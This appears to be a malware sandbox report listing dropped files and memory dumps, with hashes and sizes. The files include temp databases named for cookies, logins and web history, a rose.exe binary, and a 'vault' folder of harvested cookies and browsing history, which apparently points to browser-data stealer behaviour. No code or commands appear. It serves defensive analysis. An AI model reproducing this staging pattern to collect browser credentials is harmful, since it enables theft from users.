d36054499869a8f56ac8547ccd5455f1252c24e17d2b185955390b32da7e2a732ace4e0f30f9493fcc61425a2e31ed623465f998f41af69423ee0e3ed1483a73

Download Submit
C:\Users\Admin\AppData\Local\Temp\cookie_db

Filesize
48KB

MD5
51025d99635289325eedaab9b4332bd7

SHA1
f5fc9ef017a4c4382f525c913a1a75101b96e7ba

SHA256
63aead60cbcf31e6031484e8213a92491c1cd041862118502083ec6dbadff185

SHA512
523b98cd15692d5634736c19150e328155eeb9ba7f1d4f0bb3edf1a26b2fbacc601c6d46bcdbb8ffa177ada831de853958c8c66e8ca5b378755a1276f1771dc8

Download Submit
C:\Users\Admin\AppData\Local\Temp\login_db

Filesize
46KB

MD5
02d2c46697e3714e49f46b680b9a6b83

SHA1
84f98b56d49f01e9b6b76a4e21accf64fd319140

SHA256
522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9

SHA512
60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

Download Submit
C:\Users\Admin\AppData\Local\Temp\login_db

Filesize
56KB

MD5
d444c807029c83b8a892ac0c4971f955

SHA1
fa58ce7588513519dc8fed939b26b05dc25e53b5

SHA256
8297a7698f19bb81539a18363db100c55e357fa73f773c2b883d2c4161f6a259

SHA512
b7958b843639d4223bef65cdc6c664d7d15b76ac4e0a8b1575201dd47a32899feff32389dcc047314f47944ebe7b774cd59e51d49202f49541bbd70ecbb31a2e

Download Submit
C:\Users\Admin\AppData\Local\Temp\web_history_db

Filesize
148KB

MD5
90a1d4b55edf36fa8b4cc6974ed7d4c4

SHA1
aba1b8d0e05421e7df5982899f626211c3c4b5c1

SHA256
7cf3e9e8619904e72ea6608cc43e9b6c9f8aa2af02476f60c2b3daf33075981c

SHA512
ea0838be754e1258c230111900c5937d2b0788f90bbf7c5f82b2ceda7868e50afb86c301f313267eaa912778da45755560b5434885521bf915967a7863922ae2

Download Submit
C:\Users\Admin\AppData\Local\Temp\web_history_db

Filesize
192KB

MD5
46d7a21faaea89ca76d431a0fa603b2c

SHA1
aeb5ef4b43f888055b9d0db5a25706f5be80666d

SHA256
0b0dd5488b27f2d3ca83f761023a17a5b6b7578b734cb80fee76a022fad139bc

SHA512
caa009ac6f13871c2b0022e0e3ff01f52d85512eba6f12ca796ceb44120dffaaa6040ea0408803042da918e3c84f261a1f6dc916fcbe3bb75ade2670758d84e2

Download Submit
C:\Users\Admin\AppData\Roaming\rose\rose.exe

Filesize
12.3MB

MD5
8fd108ce50646dc8478e8aabc94c5f38

SHA1
33f82ee571bd85ffa355dbd6cba71b8925c2a9ef

SHA256
1d4f0e1b815600dd72d084ac811196bbfbbeaa10ccce0fc72cb14935bc098862

SHA512
ec7b6da5a733ff1b5e4386eee4da64fa886202275f45558b3ee31fa152fe95a97c33ab2423e206d648cf9e06ec961d7a54e0b40d35763907648cce57bee73104

Download Submit
C:\Users\Admin\AppData\Roaming\roseontop\vault\cookies.txt

Filesize
14KB

MD5
e831f70d69a5e90e8f364b76e1cb9abf

SHA1
e9fd7196476a41b0883020885ac8d8075cb412c9

SHA256
6fb573546e3601eda28f9781383b8ab55ec03dca84cb91729cfd9870bd58cfb6

SHA512
724bace0e1f8b6e17ca4f6620f566d53f4767c1798b13be6590ec2912930aa721af85e77099562fbabef4aab618a164356ac8b88a69ec874120c13ec16055260

Download Submit
C:\Users\Admin\AppData\Roaming\roseontop\vault\downloads.txt

Filesize
83B

MD5
c9636c0edbdf9a4704e6ba5306875570

SHA1
790e0e9a936822dec2c854c3dc8ede3f7b6e2ea9

SHA256
8e245c89da025a5e403a9195e042fb42cc777caeea9fed5f768e40a61947c2fc

SHA512
4cb2b709a24c4c1861a796ac6dde08de20d15646de79fe6efb149d3f928b26e8e3258ca84e6d7cd1f77f5edb02d987768e6e9b904f3de9cfd2baaaf00ac6d340

Download Submit
C:\Users\Admin\AppData\Roaming\roseontop\vault\web_history.txt

Filesize
476B

MD5
c4d86cecca133af23859101c00d05cf9

SHA1
96aa1deedcfbd473d13459c6eabc56837c609b66

SHA256
f6ae4b28ee238a9637382490263bb45d056817688c69d61373ce88feb48a3a9f

SHA512
7e9c3642e9af6f2dc02fcf6439a14a6a619b33529a04b0c5a2aa0cc2337aef50a913a50b977b16f46a3e9440b9a803d30a9b563ba49d80944887ff0efe0bea7f

Download Submit
memory/4444-1672-0x00007FF66B970000-0x00007FF66B9D9000-memory.dmp

Filesize
420KB

Download
memory/4444-775-0x00007FF66B970000-0x00007FF66B9D9000-memory.dmp

Filesize
420KB

Download
memory/5564-174-0x00007FFB30D70000-0x00007FFB30D89000-memory.dmp

Filesize
100KB

Download
memory/5564-160-0x00007FFB30B40000-0x00007FFB30B6D000-memory.dmp

Filesize
180KB

Download
memory/5564-176-0x00007FFB2DB20000-0x00007FFB2E040000-memory.dmp

Filesize
5.1MB

Download
memory/5564-161-0x00007FFB30430000-0x00007FFB30453000-memory.dmp

Filesize
140KB

Download
memory/5564-163-0x00007FFB30D70000-0x00007FFB30D89000-memory.dmp

Filesize
100KB

Download
memory/5564-164-0x00007FFB30B20000-0x00007FFB30B39000-memory.dmp

Filesize
100KB

Download
memory/5564-167-0x00007FFB317F0000-0x00007FFB31813000-memory.dmp

Filesize
140KB

Download
memory/5564-166-0x00007FFB2E7B0000-0x00007FFB2ED99000-memory.dmp

Filesize
5.9MB

Download
memory/5564-178-0x00007FFB2DA50000-0x00007FFB2DB1D000-memory.dmp

Filesize
820KB

Download
memory/5564-138-0x00007FFB3AC60000-0x00007FFB3AC6F000-memory.dmp

Filesize
60KB

Download
memory/5564-179-0x00007FFB2E040000-0x00007FFB2E1B7000-memory.dmp

Filesize
1.5MB

Download
memory/5564-122-0x00007FFB317F0000-0x00007FFB31813000-memory.dmp

Filesize
140KB

Download
memory/5564-171-0x00007FFB30B40000-0x00007FFB30B6D000-memory.dmp

Filesize
180KB

Download
memory/5564-180-0x00007FFB303D0000-0x00007FFB303E4000-memory.dmp

Filesize
80KB

Download
memory/5564-182-0x00007FFB30B20000-0x00007FFB30B39000-memory.dmp

Filesize
100KB

Download
memory/5564-117-0x00007FFB2E7B0000-0x00007FFB2ED99000-memory.dmp

Filesize
5.9MB

Download
memory/5564-162-0x00007FFB2E040000-0x00007FFB2E1B7000-memory.dmp

Filesize
1.5MB

Download
memory/5564-169-0x00007FFB3AC60000-0x00007FFB3AC6F000-memory.dmp

Filesize
60KB

Download
memory/5564-170-0x00007FFB31470000-0x00007FFB3147D000-memory.dmp

Filesize
52KB

Download
memory/5564-177-0x00007FFB30430000-0x00007FFB30453000-memory.dmp

Filesize
140KB

Download
memory/5564-181-0x00007FFB30360000-0x00007FFB3036D000-memory.dmp

Filesize
52KB

Download
memory/5564-173-0x00007FFB303F0000-0x00007FFB30423000-memory.dmp

Filesize
204KB

Download
memory/5792-98-0x000001562AF60000-0x000001562B480000-memory.dmp

Filesize
5.1MB

Download
memory/5792-99-0x00007FFB41110000-0x00007FFB4111D000-memory.dmp

Filesize
52KB

Download
memory/5792-26-0x00007FFB2F440000-0x00007FFB2FA29000-memory.dmp

Filesize
5.9MB

Download
memory/5792-32-0x00007FFB41240000-0x00007FFB41263000-memory.dmp

Filesize
140KB

Download
memory/5792-50-0x00007FFB41CD0000-0x00007FFB41CDF000-memory.dmp

Filesize
60KB

Download
memory/5792-68-0x00007FFB3AB20000-0x00007FFB3AB4D000-memory.dmp

Filesize
180KB

Download
memory/5792-382-0x00007FFB41240000-0x00007FFB41263000-memory.dmp

Filesize
140KB

Download
memory/5792-76-0x00007FFB3AA00000-0x00007FFB3AA23000-memory.dmp

Filesize
140KB

Download
memory/5792-85-0x00007FFB2F2C0000-0x00007FFB2F437000-memory.dmp

Filesize
1.5MB

Download
memory/5792-94-0x00007FFB30E20000-0x00007FFB30EED000-memory.dmp

Filesize
820KB

Download
memory/5792-289-0x00007FFB2EDA0000-0x00007FFB2F2C0000-memory.dmp

Filesize
5.1MB

Download
memory/5792-272-0x00007FFB30E20000-0x00007FFB30EED000-memory.dmp

Filesize
820KB

Download
memory/5792-240-0x00007FFB31820000-0x00007FFB31853000-memory.dmp

Filesize
204KB

Download
memory/5792-87-0x00007FFB3AB00000-0x00007FFB3AB19000-memory.dmp

Filesize
100KB

Download
memory/5792-100-0x00007FFB38890000-0x00007FFB388A9000-memory.dmp

Filesize
100KB

Download
memory/5792-183-0x00007FFB3AA00000-0x00007FFB3AA23000-memory.dmp

Filesize
140KB

Download
memory/5792-194-0x00007FFB2D930000-0x00007FFB2DA4C000-memory.dmp

Filesize
1.1MB

Download
memory/5792-93-0x00007FFB31820000-0x00007FFB31853000-memory.dmp

Filesize
204KB

Download
memory/5792-95-0x00007FFB2EDA0000-0x00007FFB2F2C0000-memory.dmp

Filesize
5.1MB

Download
memory/5792-328-0x00007FFB2F440000-0x00007FFB2FA29000-memory.dmp

Filesize
5.9MB

Download
memory/5792-168-0x00007FFB41240000-0x00007FFB41263000-memory.dmp

Filesize
140KB

Download
memory/5792-101-0x00007FFB41200000-0x00007FFB4120D000-memory.dmp

Filesize
52KB

Download
memory/5792-107-0x00007FFB32C70000-0x00007FFB32C84000-memory.dmp

Filesize
80KB

Download
memory/5792-1695-0x00007FFB41240000-0x00007FFB41263000-memory.dmp

Filesize
140KB

Download
memory/5792-1694-0x00007FFB2F440000-0x00007FFB2FA29000-memory.dmp

Filesize
5.9MB

Download
memory/5792-158-0x00007FFB2F440000-0x00007FFB2FA29000-memory.dmp

Filesize
5.9MB

Download
memory/5792-192-0x000001562AF60000-0x000001562B480000-memory.dmp

Filesize
5.1MB

Download
memory/5792-201-0x00007FFB2F440000-0x00007FFB2FA29000-memory.dmp

Filesize
5.9MB

Download
memory/5792-190-0x00007FFB2EDA0000-0x00007FFB2F2C0000-memory.dmp

Filesize
5.1MB

Download
memory/5792-185-0x00007FFB2F2C0000-0x00007FFB2F437000-memory.dmp

Filesize
1.5MB

Download
memory/6080-696-0x000001D31ECF0000-0x000001D31ED00000-memory.dmp

Filesize
64KB

Download
memory/6080-295-0x000001D31ECF0000-0x000001D31ED00000-memory.dmp

Filesize
64KB

Download
memory/6080-297-0x000001D31ECF0000-0x000001D31ED00000-memory.dmp

Filesize
64KB

Download
memory/6080-294-0x00007FFB2CDB0000-0x00007FFB2D871000-memory.dmp

Filesize
10.8MB

Download
memory/6080-221-0x000001D337420000-0x000001D337442000-memory.dmp

Filesize
136KB

Download
memory/6164-198-0x00007FFB2CDB0000-0x00007FFB2D871000-memory.dmp

Filesize
10.8MB

Download
memory/6164-608-0x0000023045220000-0x0000023045230000-memory.dmp

Filesize
64KB

Download
memory/6164-954-0x0000023045220000-0x0000023045230000-memory.dmp

Filesize
64KB

Download
memory/6164-296-0x0000023045220000-0x0000023045230000-memory.dmp

Filesize
64KB

Download
memory/6164-298-0x0000023045220000-0x0000023045230000-memory.dmp

Filesize
64KB

Download
memory/6640-159-0x00007FFB30D90000-0x00007FFB30DB3000-memory.dmp

Filesize
140KB

Download
memory/6640-208-0x00007FFB2CCA0000-0x00007FFB2CCCD000-memory.dmp

Filesize
180KB

Download
memory/6640-202-0x00007FFB2E1C0000-0x00007FFB2E7A9000-memory.dmp

Filesize
5.9MB

Download
memory/6640-205-0x00007FFB30D90000-0x00007FFB30DB3000-memory.dmp

Filesize
140KB

Download
memory/6640-207-0x00007FFB38220000-0x00007FFB3822F000-memory.dmp

Filesize
60KB

Download
memory/6640-200-0x00007FFB2CC50000-0x00007FFB2CC73000-memory.dmp

Filesize
140KB

Download
memory/6640-210-0x00007FFB2CC80000-0x00007FFB2CC99000-memory.dmp

Filesize
100KB

Download
memory/6640-237-0x00007FFB2BD40000-0x00007FFB2BD73000-memory.dmp

Filesize
204KB

Download
memory/6640-273-0x00007FFB2B730000-0x00007FFB2B744000-memory.dmp

Filesize
80KB

Download
memory/6640-239-0x00007FFB2B820000-0x00007FFB2BD40000-memory.dmp

Filesize
5.1MB

Download
memory/6640-288-0x00007FFB3AC60000-0x00007FFB3AC6D000-memory.dmp

Filesize
52KB

Download
memory/6640-199-0x00007FFB2CC80000-0x00007FFB2CC99000-memory.dmp

Filesize
100KB

Download
memory/6640-241-0x00007FFB2B750000-0x00007FFB2B81D000-memory.dmp

Filesize
820KB

Download
memory/6640-222-0x00007FFB2CC50000-0x00007FFB2CC73000-memory.dmp

Filesize
140KB

Download
memory/6640-233-0x00007FFB2CAD0000-0x00007FFB2CC47000-memory.dmp

Filesize
1.5MB

Download
memory/6640-234-0x00007FFB2BD80000-0x00007FFB2BD99000-memory.dmp

Filesize
100KB

Download
memory/6640-235-0x00007FFB302C0000-0x00007FFB302CD000-memory.dmp

Filesize
52KB

Download
memory/6640-153-0x00007FFB38220000-0x00007FFB3822F000-memory.dmp

Filesize
60KB

Download
memory/6640-152-0x00007FFB2E1C0000-0x00007FFB2E7A9000-memory.dmp

Filesize
5.9MB

Download
memory/7344-300-0x0000024F0ABD0000-0x0000024F0ABE0000-memory.dmp

Filesize
64KB

Download
memory/7344-302-0x0000024F0ABD0000-0x0000024F0ABE0000-memory.dmp

Filesize
64KB

Download
memory/7344-299-0x00007FFB2CDB0000-0x00007FFB2D871000-memory.dmp

Filesize
10.8MB

Download
memory/7512-326-0x000002CC814D0000-0x000002CC814E0000-memory.dmp

Filesize
64KB

Download
memory/7512-761-0x00007FFB2CDB0000-0x00007FFB2D871000-memory.dmp

Filesize
10.8MB

Download
memory/7512-325-0x000002CC814D0000-0x000002CC814E0000-memory.dmp

Filesize
64KB

Download
memory/7608-929-0x00007FFB2CDB0000-0x00007FFB2D871000-memory.dmp

Filesize
10.8MB

Download
memory/7608-602-0x0000019BBC660000-0x0000019BBC670000-memory.dmp

Filesize
64KB

Download
memory/7608-599-0x0000019BBC660000-0x0000019BBC670000-memory.dmp

Filesize
64KB

Download
memory/7872-675-0x0000018A75900000-0x0000018A75910000-memory.dmp

Filesize
64KB

Download
memory/7872-660-0x0000018A75900000-0x0000018A75910000-memory.dmp

Filesize
64KB

Download
memory/7872-639-0x00007FFB2CDB0000-0x00007FFB2D871000-memory.dmp

Filesize
10.8MB

Download